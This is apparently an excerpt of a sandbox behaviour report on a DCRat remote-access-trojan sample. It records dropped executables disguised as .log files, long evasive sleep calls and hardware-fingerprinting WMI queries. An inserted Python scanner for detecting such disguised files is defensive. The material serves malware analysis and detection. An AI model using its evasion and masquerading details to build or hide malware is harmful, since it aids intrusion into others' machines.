                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\yYksYVbT.log
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi436E.tmp
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4DB5.tmp
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\MAAYLQkP.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\wKKCkQsU.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\OWmHElNj.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\BXyiPEuJ.log
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\lealJKxT.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\XaQepXPR.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\gaqNoVOB.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\jUtdfVsr.log
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4DD5.tmp
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\LMwQZDoR.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\pAGUOyAM.log
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4A94.tmp
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\GKQhrBJx.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\YTLXwDIz.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\SFtfhzmX.log
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C8A.tmp
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4D85.tmp
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\xqfrsuNN.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\zbqSUreo.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\SEFybwug.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\vSFbtVsB.log
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI43FC.tmp
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\hwUMgwXg.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\vlAbNuev.log
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4B03.tmp
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\lKQdHBzT.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\jyGvCfcb.log
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4A36.tmp
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\aHPfiQDx.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZkmfqpvS.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\nBMUCfZn.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\dYYVtYJg.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\AOGsABiv.log
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI447A.tmp
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\XgvwQtEs.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\JrPikvxc.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\jLWdviZu.log
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\ClgJzaDG.log
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4969.tmp
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\uAoBkxMT.log
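The dropped-file entries above show both loaders writing PE images to the Desktop under random eight-character names with a .log extension, which is exactly the kind of file that an extension-based search or a casual directory listing will ignore. The following Python scanner is an added example (not Joe Sandbox code and not part of this report) of the on-host check a responder would run on a machine that executed this sample: it walks a directory and reports files whose content carries an MZ header with e_lfanew pointing at a PE\0\0 signature but whose extension is not one a PE normally has. The fixture it builds is constructed for the example (a minimal MZ/PE stub named after one of the dropped files, a genuine text log, and a stub with a proper .exe extension); the list of "expected" PE extensions is an assumption and should be tuned to the environment.

```python
"""Find PE images hiding under non-PE extensions (added example; not part of the report)."""
import os
import struct
import tempfile

# Extensions under which PE content is unsurprising. Assumption: keep .tmp out of
# the hit list because MSI/Advanced Installer stage real DLLs as MSI*.tmp files.
PE_EXTS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".tmp"}


def is_pe(path):
    """True if the file has an MZ DOS header whose e_lfanew points at 'PE\\0\\0'."""
    try:
        with open(path, "rb") as f:
            dos = f.read(0x40)                       # IMAGE_DOS_HEADER is 64 bytes
            if len(dos) < 0x40 or dos[:2] != b"MZ":
                return False
            e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
            f.seek(e_lfanew)
            return f.read(4) == b"PE\0\0"           # short read past EOF returns b""
    except OSError:
        return False


def find_masquerading_pe(root):
    """Walk root and return sorted paths of PE files with a non-PE extension."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() in PE_EXTS:
                continue
            full = os.path.join(dirpath, name)
            if is_pe(full):
                hits.append(full)
    return sorted(hits)


def build_fixture(root):
    """Constructed test data: minimal MZ/PE stub as '.log', a real text log, a '.exe' stub."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)      # e_lfanew -> offset 0x40
    header[0x40:0x44] = b"PE\0\0"
    with open(os.path.join(root, "OfhhMrNQ.log"), "wb") as f:   # name taken from the report
        f.write(bytes(header))
    with open(os.path.join(root, "app.log"), "w") as f:         # ordinary text log, not a hit
        f.write("2024-12-05 12:00:00 INFO service started\n")
    with open(os.path.join(root, "installer.exe"), "wb") as f:  # PE under a PE extension, not a hit
        f.write(bytes(header))
    return root


def scan_fixture():
    """Build the fixture in a temporary directory and return the basenames it flags."""
    with tempfile.TemporaryDirectory() as d:
        return [os.path.basename(p) for p in find_masquerading_pe(build_fixture(d))]


if __name__ == "__main__":
    for hit in scan_fixture():
        print("PE content under a non-PE extension:", hit)
```

Checking e_lfanew rather than only the MZ bytes avoids false positives on MS-DOS stubs and on text files that happen to start with "MZ"; on a real host the scan would be pointed at the user profile and at the persistence directories named in this report (C:\bridgeMonitorDhcpCommon, the Reference Assemblies and Windows NT\Accessories paths) rather than at a fixture.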
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe TID: 7388Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 8032Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -35971150943733603s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -599874s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598859s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598718s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598499s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598375s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 5316Thread sleep time: -7200000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -597421s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -597250s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -597103s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596999s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596859s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596733s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596623s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 5316 | Thread sleep time: -300000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596515s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596406s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596296s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596187s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -596078s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595968s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595859s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595749s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595640s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595530s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595421s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -595289s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -594630s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -594499s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -594385s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -594281s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -594168s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -594062s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593949s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593843s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593734s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593624s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593487s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593359s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593249s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593140s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -593031s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -592921s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -592812s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -592702s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -592540s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -592427s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -592046s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -591878s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -591732s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -591624s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 1448 | Thread sleep time: -591515s >= -30000s
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | TID: 8152 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File Volume queried: C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0049A69B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_004AC220
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009866E0 ReadFile,FindFirstFileW,CloseHandle,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_2_009866E0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00960050 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,3_2_00960050
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009603E0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,3_2_009603E0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009444C0 GetShortPathNameW,FindFirstFileW,FindNextFileW,FindClose,3_2_009444C0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00988600 FindFirstFileW,FindClose,3_2_00988600
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009A4C70 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,3_2_009A4C70
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00861A20 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,3_2_00861A20
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AE6A3 VirtualQuery,GetSystemInfo,1_2_004AE6A3
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 599874
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 598859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 598718
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 598499
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 598375
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 597421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 597250
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 597103
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596999
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596733
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596623
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596515
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596406
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596296
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596187
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 596078
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595968
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595749
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595640
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595530
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 595289
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 594630
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 594499
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 594385
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 594281
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 594168
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 594062
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593949
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593843
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593734
